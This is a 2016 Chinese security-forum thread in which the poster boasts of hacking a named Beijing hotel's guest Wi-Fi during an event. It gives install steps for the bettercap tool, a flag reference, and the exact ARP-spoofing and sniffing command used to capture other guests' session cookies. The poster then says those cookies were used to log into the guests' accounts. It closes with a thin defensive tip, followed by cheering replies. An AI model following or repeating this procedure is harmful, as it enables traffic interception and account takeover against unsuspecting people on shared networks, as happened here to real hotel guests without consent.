请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 3787|回复: 20

中间人攻击北京丽都皇冠酒店(附视频)

[复制链接]
  • TA的每日心情
    奋斗
    2016-7-14 17:48
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2016-4-11 19:59:19 | 显示全部楼层 |阅读模式
    必须要兑现承诺,前几天SSS安全team受邀在补天年度颁奖典礼暨新品发布会装了一逼

    去之前就说过要『走到哪儿黑到哪儿』(ps:8号晚上王健林也在该酒店出没)
    视频:http://v.qq.com/page/b/i/p/b0193ieyfip.html



    0x01
    一直以来,我们都在用ettercap工具做arp和dns攻击
    本次采用一个新的工具bettercap (仅限arp)
    环境:
    Kali2.0 vm
    Rtl8187L外置网卡
    目标无线不需要密码,已连接
    Bettercap1.5.2
    Cookie hack插件

    git clone https://github.com/evilsocket/bettercap
    cd bettercap
    gem build bettercap.gemspec
    sudo gem install bettercap*.gem
    图片1.png

    如果报错,执行以下命令
    sudo apt-get install ruby-dev libpcap-dev
    sudo gem install bettercap*.gem
    图片5.png


    若再出现错误,可能是因为rubygems源的问题,国内有人把源迁到国内
    请执行下面的命令
    gem sources --add https://ruby.taobao.org/ --remove https://rubygems.org/
    gem sources -l *** CURRENT SOURCES ***
    https://ruby.taobao.org#
    再或者gem install bettercap 直接安装bettercap

    用法:
    -I, --interface IFACE 指定Network interface name,默认eth0
    -S, --spoofer NAME 指定欺骗模块,此参数默认为ARP,目前仅支持ARP,新版本会添加更多选项
    -T, --target ADDRESS 指定单一ip,如果未设置,则代表所有子网,子网所有主机自动扫描,简单高效,十分推荐
    -O, --log LOG_FILE 日志功能

    -D, --debug 调试功能,会将每一步操作详细记录,便于调试
    -L, --local 解析流经本机的所有数据包(此操作会开启嗅探器),此参数默认为关闭
    -X, --sniffer 开启嗅探器. --sniffer-pcap FILE 将数据包保存为PCAP文件,可用Wireshark打开(此操作会开启嗅探器) --sniffer-filter EXPRESSION 配置嗅探器使用BPF过滤器(此操作会开启嗅探器)
    -P, --parsers PARSERS 指定数据包(此操作会开启嗅探器),支持NTLMSS, IRC, POST, URL, FTP, HTTPS, HTTPAUTH, MAIL,此参数默认为所有 --no-discovery 只使用当前的ARP缓存,不去扫描其他主机,此参数默认为关闭 --no-spoofing 关闭欺骗模块,也可以使用参数--spoofer NONE代替 --proxy 启用HTTP代理并且重定向所有HTTP请求至本机,此参数默认为关闭 --proxy-port PORT 设置HTTP代理端口,此参数默认为8080 --proxy-module MODULE 指定加载的Ruby模块 --httpd 开启HTTP服务器,此参数默认为关闭 --httpd-port PORT 指定HTTP server port, 此参数默认为8081. --httpd-path PATH 指定HTTP server path,此参数默认为 ./.
    -h, --help 英文帮助



    本次用到的命令:
    Bettercap -I wlan0 -X -T 目标ip
    图片2.png
    图片3.png
    图片4.png
    然后拿到cookie,使用cookie hack插件登陆账号
    0x02
    修复建议:团队内的无线安全研究成员说是在路由器上做策略、楼主表示不是很懂,欢迎踊跃讨论。学习学习。
    给看官的建议:不要连接不可信任的公共wifi,敏感操作还是使用4G网络吧,不,啥操作也不要连别人的wifi。
    参考:http://drops.wooyun.org/papers/7480

    回复

    使用道具 举报

  • TA的每日心情
    无聊
    10 小时前
  • 签到天数: 406 天

    [LV.9]以坛为家II

    发表于 2016-4-11 20:49:37 | 显示全部楼层
    治好了我的颈椎病。
  • TA的每日心情
    擦汗
    2016-8-16 12:54
  • 签到天数: 38 天

    [LV.5]常住居民I

    发表于 2016-4-11 20:03:08 | 显示全部楼层
    前排前排   6666
  • TA的每日心情

    2017-2-8 15:07
  • 签到天数: 147 天

    [LV.7]常住居民III

    发表于 2016-4-11 20:04:23 | 显示全部楼层
    一楼,可以的,黑客。满分
  • TA的每日心情
    奋斗
    前天 15:04
  • 签到天数: 175 天

    [LV.7]常住居民III

    发表于 2016-4-11 20:07:51 | 显示全部楼层
    任性。。。。6666
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-1-8 19:54
  • 签到天数: 20 天

    [LV.4]偶尔看看III

    发表于 2016-4-11 20:51:17 来自手机 | 显示全部楼层
    表示用自己4g也不知道是不是连上了伪基站
  • TA的每日心情
    奋斗
    2016-7-14 17:48
  • 签到天数: 7 天

    [LV.3]偶尔看看II

     楼主| 发表于 2016-4-11 20:56:24 | 显示全部楼层
    Grep 发表于 2016-4-11 20:51
    表示用自己4g也不知道是不是连上了伪基站

    伪基站是不需要连接的
  • TA的每日心情

    2017-2-14 15:24
  • 签到天数: 96 天

    [LV.6]常住居民II

    发表于 2016-4-11 22:19:18 | 显示全部楼层
    牛逼到任性。
  • TA的每日心情
    无聊
    2016-7-14 16:24
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2016-4-12 08:06:21 | 显示全部楼层
    前排支持
    回复

    使用道具 举报

  • TA的每日心情

    2015-11-25 10:00
  • 签到天数: 86 天

    [LV.6]常住居民II

    发表于 2016-4-12 12:26:35 | 显示全部楼层
    这意思是可以打到别人连了WiFi以后的所有cookie么
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-2-24 23:21 , Processed in 0.529447 second(s), 39 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表